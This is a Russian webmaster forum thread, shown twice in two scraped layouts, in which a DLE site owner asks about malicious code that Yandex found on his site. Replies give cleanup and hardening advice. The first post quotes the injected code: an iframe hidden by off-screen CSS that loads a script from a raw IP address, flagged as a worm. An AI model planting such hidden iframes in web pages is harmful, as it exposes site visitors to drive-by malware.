Вирус или что на сайте

**andys1** · 09.02.2013 15:23

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

<style>.hp60pdz1o { position:absolute; left:-1256px; top:-1442px} </style> <div class="hp60pdz1o"><iframe src="http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php" width="389" height="473"></iframe>
Это что такое?Все проги показывают,что вирусов нет.Страницу проверяли ничего нет...

**Гендальф Серый** · 09.02.2013 15:25

Стесняюсь спросить, а это что

Сообщение от andys1

http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php

?

аваст ругается на ссылку, говоря что это червяк. Совсем вы невнимательны, уважаемый. Плохо проверяете.

Очень интересно, какие именно "проги" показывают отсутсвие вирусов, что даже мой дряхлый avast-free нашёл в себе силы выдавить сообщение об опасности?

**semyon** · 09.02.2013 15:28

andys1, Вам дали файл. Проверьте его, за что отвечает. Что делает.
А так вот по буковкам, мало чего скажешь.

**beaut** · 09.02.2013 15:29

Странно... А мне почему-то Яндекс не указывает никогда, где именно вирус, всегда пишет просто поведенческие факторы, и все...

**andys1** · 09.02.2013 15:31

Генальф Серый,Как найти ее и удалить ? Подскажите

**Гендальф Серый** · 09.02.2013 15:34

andys1, а бог ты мой. Кто ж вас в интернет вообще пустил? У вас чёрными латинскими буквами написано где она висит! Это раз.
Чтобы такого больше не повторялось - советую:
а) Проверить .htaccess на наличие чужого кода
б) Поменять пароли на БД и ФТП и пользоваться более безопасным софтом для обмена данных с сервером.
Это два.

**andys1** · 08.03.2013 22:33

Гендальф Серый,Все ,я смотрю,умные только языком трепать..До сих пор ничего не помогло,все пересмотрели..
Сайт на ДЛЕ.

Началось примерно месяц назад.Яндекс прислал письмо о вред.коде на сайте.

Все пересмотрели,что-то удалили, заменили jquaery,через пару дней Яндекс написал,что все ОК,кода нет...

Через 2 дня--опять,что вред.код! В супре я посмотрел все сайты на этом хостинге--через одного --вредоносный код. Я написал хостеру--он мне прислал отчет-проверка сервера-все ок!

Через пару дней опять--вредоносный код на сайте! Потом через 2 часа!!!---Яндекс пишет,что все ок,вредоносного кода нет, а выглядел он так-то и так-то..Но никаких ,естественно работ на сайте мы не производили.....Ничего не делали....

Так меня это уже все достало,эти качели...вот уже Яндекс раз 10-тый присылает ,то есть код,то нету. Может кто поможет разобраться

**izyalex** · 08.03.2013 22:37

andys1, Согласен помочь, не бесплатно, если будет над чем поработать. Одно условие, требуется SSH доступ к хостингу.

**andys1** · 08.03.2013 22:45

izyalex,А удаленно подсказать не бесплатно,конечно,можно?

**izyalex** · 08.03.2013 23:01

andys1,

Удалите вредоносный код.
Найдите и удалите все веб-шеллы.
Закройте от посторонних глаз админки CMS.
Обновите все CMS и все ее плагины до последней версии.
Установите все рекомендации разработчиков CMS по безопасности, от .htaccess файлов в папках с картинками до нужных прав на папки и файлы.

... можно по ситуации(наблюдение за access логами) еще что-то добавить

	09.02.2013 15:23 #1
andys1 Студент Регистрация: 29.12.2012 Сообщений: 46 Репутация: 0	При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания: <style>.hp60pdz1o { position:absolute; left:-1256px; top:-1442px} </style> <div class="hp60pdz1o"><iframe src="http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php" width="389" height="473"></iframe> Это что такое?Все проги показывают,что вирусов нет.Страницу проверяли ничего нет...
0 andys1

	09.02.2013 15:25 #2
Гендальф Серый You shall not pass. Ага. Регистрация: 02.02.2013 Сообщений: 1,184 Репутация: 1513 Webmoney BL: ?	Стесняюсь спросить, а это что Сообщение от andys1 http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php ? аваст ругается на ссылку, говоря что это червяк. Совсем вы невнимательны, уважаемый. Плохо проверяете. Очень интересно, какие именно "проги" показывают отсутсвие вирусов, что даже мой дряхлый avast-free нашёл в себе силы выдавить сообщение об опасности? Последний раз редактировалось Гендальф Серый; 09.02.2013 в 15:27. Причина: проверил авастом VPN для самых важных нужд, только для своих (не уносите ссылку) вот здесь.
0 Гендальф Серый

	09.02.2013 15:28 #3
semyon Web-разработка Регистрация: 20.06.2011 Сообщений: 1,781 Репутация: 549 Webmoney BL: ?	andys1, Вам дали файл. Проверьте его, за что отвечает. Что делает. А так вот по буковкам, мало чего скажешь. Создание и доработка Ваших сайтов
0 semyon

	09.02.2013 15:29 #4
beaut Опытный Регистрация: 08.06.2011 Сообщений: 479 Репутация: 28 Webmoney BL: ?	Странно... А мне почему-то Яндекс не указывает никогда, где именно вирус, всегда пишет просто поведенческие факторы, и все... Чистка лица за 300 рублей и новогодние представления
0 beaut

	09.02.2013 15:31 #5
andys1 Студент Регистрация: 29.12.2012 Сообщений: 46 Репутация: 0	Генальф Серый,Как найти ее и удалить ? Подскажите
0 andys1

Вирус или что на сайте

Опции темы

Тэги топика:

Похожие темы

Вирус на сайте?

Вирус на сайте.

Вирус на сайте.

Вирус на сайте

Тем:

Сообщений:

Пользователей:

Сейчас на сайте:

Вход

Сайт

Разделы

Прочее

Следите за нами

Витрина ссылок

У нас проходит

У кого попросить инвайт?

Золотые темы форума

Последние новости

Популярные темы

Информеры

	09.02.2013 15:34 #6
Гендальф Серый You shall not pass. Ага. Регистрация: 02.02.2013 Сообщений: 1,184 Репутация: 1513 Webmoney BL: ?	andys1, а бог ты мой. Кто ж вас в интернет вообще пустил? У вас чёрными латинскими буквами написано где она висит! Это раз. Чтобы такого больше не повторялось - советую: а) Проверить .htaccess на наличие чужого кода б) Поменять пароли на БД и ФТП и пользоваться более безопасным софтом для обмена данных с сервером. Это два. VPN для самых важных нужд, только для своих (не уносите ссылку) вот здесь.
-1 Гендальф Серый

	08.03.2013 22:33 #7
andys1 Студент Регистрация: 29.12.2012 Сообщений: 46 Репутация: 0	Гендальф Серый,Все ,я смотрю,умные только языком трепать..До сих пор ничего не помогло,все пересмотрели.. Сайт на ДЛЕ. Началось примерно месяц назад.Яндекс прислал письмо о вред.коде на сайте. Все пересмотрели,что-то удалили, заменили jquaery,через пару дней Яндекс написал,что все ОК,кода нет... Через 2 дня--опять,что вред.код! В супре я посмотрел все сайты на этом хостинге--через одного --вредоносный код. Я написал хостеру--он мне прислал отчет-проверка сервера-все ок! Через пару дней опять--вредоносный код на сайте! Потом через 2 часа!!!---Яндекс пишет,что все ок,вредоносного кода нет, а выглядел он так-то и так-то..Но никаких ,естественно работ на сайте мы не производили.....Ничего не делали.... Так меня это уже все достало,эти качели...вот уже Яндекс раз 10-тый присылает ,то есть код,то нету. Может кто поможет разобраться
-1 andys1

	08.03.2013 22:37 #8
izyalex Опытный Регистрация: 20.11.2012 Сообщений: 254 Репутация: 38 Webmoney BL: ?	andys1, Согласен помочь, не бесплатно, если будет над чем поработать. Одно условие, требуется SSH доступ к хостингу. Сpanel хостинг и ISPmanager хостинг от 119р./мес VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
0 izyalex

	08.03.2013 22:45 #9
andys1 Студент Регистрация: 29.12.2012 Сообщений: 46 Репутация: 0	izyalex,А удаленно подсказать не бесплатно,конечно,можно?
0 andys1

	08.03.2013 23:01 #10
izyalex Опытный Регистрация: 20.11.2012 Сообщений: 254 Репутация: 38 Webmoney BL: ?	andys1, Удалите вредоносный код. Найдите и удалите все веб-шеллы. Закройте от посторонних глаз админки CMS. Обновите все CMS и все ее плагины до последней версии. Установите все рекомендации разработчиков CMS по безопасности, от .htaccess файлов в папках с картинками до нужных прав на папки и файлы. ... можно по ситуации(наблюдение за access логами) еще что-то добавить Сpanel хостинг и ISPmanager хостинг от 119р./мес VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
0 izyalex

Темы	Раздел	Ответов	Последний пост
Вирус на сайте?	Вопросы от новичков	19	24.09.2012 17:01
Вирус на сайте.	WordPress	2	07.04.2012 21:23
Вирус на сайте.	Web программирование	1	03.04.2012 13:25
Вирус на сайте	Софт, скрипты, сервисы	27	15.02.2010 21:41